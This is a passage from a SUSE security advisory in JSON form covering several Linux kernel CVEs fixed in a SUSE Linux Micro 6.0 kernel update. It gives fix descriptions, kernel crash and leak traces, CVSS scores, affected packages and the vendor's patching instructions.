"url": "https://bugzilla.suse.com/1250032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-39813"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39880",
"url": "https://www.suse.com/security/cve/CVE-2025-39880"
},
{
"category": "external",
"summary": "SUSE Bug 1250388 for CVE-2025-39880",
"url": "https://bugzilla.suse.com/1250388"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-39880"
},
{
"cve": "CVE-2025-39890",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39890"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: fix memory leak in ath12k_service_ready_ext_event\n\nCurrently, in ath12k_service_ready_ext_event(), svc_rdy_ext.mac_phy_caps\nis not freed in the failure case, causing a memory leak. The following\ntrace is observed in kmemleak:\n\nunreferenced object 0xffff8b3eb5789c00 (size 1024):\n comm \"softirq\", pid 0, jiffies 4294942577\n hex dump (first 32 bytes):\n 00 00 00 00 01 00 00 00 00 00 00 00 7b 00 00 10 ............{...\n 01 00 00 00 00 00 00 00 01 00 00 00 1f 38 00 00 .............8..\n backtrace (crc 44e1c357):\n __kmalloc_noprof+0x30b/0x410\n ath12k_wmi_mac_phy_caps_parse+0x84/0x100 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_wmi_svc_rdy_ext_parse+0x308/0x4c0 [ath12k]\n ath12k_wmi_tlv_iter+0x5e/0x140 [ath12k]\n ath12k_service_ready_ext_event.isra.0+0x44/0xd0 [ath12k]\n ath12k_wmi_op_rx+0x2eb/0xd70 [ath12k]\n ath12k_htc_rx_completion_handler+0x1f4/0x330 [ath12k]\n ath12k_ce_recv_process_cb+0x218/0x300 [ath12k]\n ath12k_pci_ce_workqueue+0x1b/0x30 [ath12k]\n process_one_work+0x219/0x680\n bh_worker+0x198/0x1f0\n tasklet_action+0x13/0x30\n handle_softirqs+0xca/0x460\n __irq_exit_rcu+0xbe/0x110\n irq_exit_rcu+0x9/0x30\n\nFree svc_rdy_ext.mac_phy_caps in the error case to fix this memory leak.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.4.1-00199-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39890",
"url": "https://www.suse.com/security/cve/CVE-2025-39890"
},
{
"category": "external",
"summary": "SUSE Bug 1250334 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "external",
"summary": "SUSE Bug 1250488 for CVE-2025-39890",
"url": "https://bugzilla.suse.com/1250488"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-39890"
},
{
"cve": "CVE-2025-39913",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39913"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-\u003ecork.\n\nsyzbot reported the splat below. [0]\n\nThe repro does the following:\n\n 1. Load a sk_msg prog that calls bpf_msg_cork_bytes(msg, cork_bytes)\n 2. Attach the prog to a SOCKMAP\n 3. Add a socket to the SOCKMAP\n 4. Activate fault injection\n 5. Send data less than cork_bytes\n\nAt 5., the data is carried over to the next sendmsg() as it is\nsmaller than the cork_bytes specified by bpf_msg_cork_bytes().\n\nThen, tcp_bpf_send_verdict() tries to allocate psock-\u003ecork to hold\nthe data, but this fails silently due to fault injection + __GFP_NOWARN.\n\nIf the allocation fails, we need to revert the sk-\u003esk_forward_alloc\nchange done by sk_msg_alloc().\n\nLet\u0027s call sk_msg_free() when tcp_bpf_send_verdict fails to allocate\npsock-\u003ecork.\n\nThe \"*copied\" also needs to be updated such that a proper error can\nbe returned to the caller, sendmsg. It fails to allocate psock-\u003ecork.\nNothing has been corked so far, so this patch simply sets \"*copied\"\nto 0.\n\n[0]:\nWARNING: net/ipv4/af_inet.c:156 at inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156, CPU#1: syz-executor/5983\nModules linked in:\nCPU: 1 UID: 0 PID: 5983 Comm: syz-executor Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/12/2025\nRIP: 0010:inet_sock_destruct+0x623/0x730 net/ipv4/af_inet.c:156\nCode: 0f 0b 90 e9 62 fe ff ff e8 7a db b5 f7 90 0f 0b 90 e9 95 fe ff ff e8 6c db b5 f7 90 0f 0b 90 e9 bb fe ff ff e8 5e db b5 f7 90 \u003c0f\u003e 0b 90 e9 e1 fe ff ff 89 f9 80 e1 07 80 c1 03 38 c1 0f 8c 9f fc\nRSP: 0018:ffffc90000a08b48 EFLAGS: 00010246\nRAX: ffffffff8a09d0b2 RBX: dffffc0000000000 RCX: ffff888024a23c80\nRDX: 0000000000000100 RSI: 0000000000000fff RDI: 0000000000000000\nRBP: 0000000000000fff R08: ffff88807e07c627 R09: 1ffff1100fc0f8c4\nR10: dffffc0000000000 R11: ffffed100fc0f8c5 R12: ffff88807e07c380\nR13: dffffc0000000000 R14: ffff88807e07c60c R15: 1ffff1100fc0f872\nFS: 00005555604c4500(0000) GS:ffff888125af1000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00005555604df5c8 CR3: 0000000032b06000 CR4: 00000000003526f0\nCall Trace:\n \u003cIRQ\u003e\n __sk_destruct+0x86/0x660 net/core/sock.c:2339\n rcu_do_batch kernel/rcu/tree.c:2605 [inline]\n rcu_core+0xca8/0x1770 kernel/rcu/tree.c:2861\n handle_softirqs+0x286/0x870 kernel/softirq.c:579\n __do_softirq kernel/softirq.c:613 [inline]\n invoke_softirq kernel/softirq.c:453 [inline]\n __irq_exit_rcu+0xca/0x1f0 kernel/softirq.c:680\n irq_exit_rcu+0x9/0x30 kernel/softirq.c:696\n instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1052 [inline]\n sysvec_apic_timer_interrupt+0xa6/0xc0 arch/x86/kernel/apic/apic.c:1052\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39913",
"url": "https://www.suse.com/security/cve/CVE-2025-39913"
},
{
"category": "external",
"summary": "SUSE Bug 1250705 for CVE-2025-39913",
"url": "https://bugzilla.suse.com/1250705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-39913"
},
{
"cve": "CVE-2025-39977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfutex: Prevent use-after-free during requeue-PI\n\nsyzbot managed to trigger the following race:\n\n T1 T2\n\n futex_wait_requeue_pi()\n futex_do_wait()\n schedule()\n futex_requeue()\n futex_proxy_trylock_atomic()\n futex_requeue_pi_prepare()\n requeue_pi_wake_futex()\n futex_requeue_pi_complete()\n /* preempt */\n\n * timeout/ signal wakes T1 *\n\n futex_requeue_pi_wakeup_sync() // Q_REQUEUE_PI_LOCKED\n futex_hash_put()\n // back to userland, on stack futex_q is garbage\n\n /* back */\n wake_up_state(q-\u003etask, TASK_NORMAL);\n\nIn this scenario futex_wait_requeue_pi() is able to leave without using\nfutex_q::lock_ptr for synchronization.\n\nThis can be prevented by reading futex_q::task before updating the\nfutex_q::requeue_state. A reference on the task_struct is not needed\nbecause requeue_pi_wake_futex() is invoked with a spinlock_t held which\nimplies a RCU read section.\n\nEven if T1 terminates immediately after, the task_struct will remain valid\nduring T2\u0027s wake_up_state(). A READ_ONCE on futex_q::task before\nfutex_requeue_pi_complete() is enough because it ensures that the variable\nis read before the state is updated.\n\nRead futex_q::task before updating the requeue state, use it for the\nfollowing wakeup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39977",
"url": "https://www.suse.com/security/cve/CVE-2025-39977"
},
{
"category": "external",
"summary": "SUSE Bug 1252046 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "external",
"summary": "SUSE Bug 1252048 for CVE-2025-39977",
"url": "https://bugzilla.suse.com/1252048"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-39977"
},
{
"cve": "CVE-2025-40006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: fix folio is still mapped when deleted\n\nMigration may be raced with fallocating hole. remove_inode_single_folio\nwill unmap the folio if the folio is still mapped. However, it\u0027s called\nwithout folio lock. If the folio is migrated and the mapped pte has been\nconverted to migration entry, folio_mapped() returns false, and won\u0027t\nunmap it. Due to extra refcount held by remove_inode_single_folio,\nmigration fails, restores migration entry to normal pte, and the folio is\nmapped again. As a result, we triggered BUG in filemap_unaccount_folio.\n\nThe log is as follows:\n BUG: Bad page cache in process hugetlb pfn:156c00\n page: refcount:515 mapcount:0 mapping:0000000099fef6e1 index:0x0 pfn:0x156c00\n head: order:9 mapcount:1 entire_mapcount:1 nr_pages_mapped:0 pincount:0\n aops:hugetlbfs_aops ino:dcc dentry name(?):\"my_hugepage_file\"\n flags: 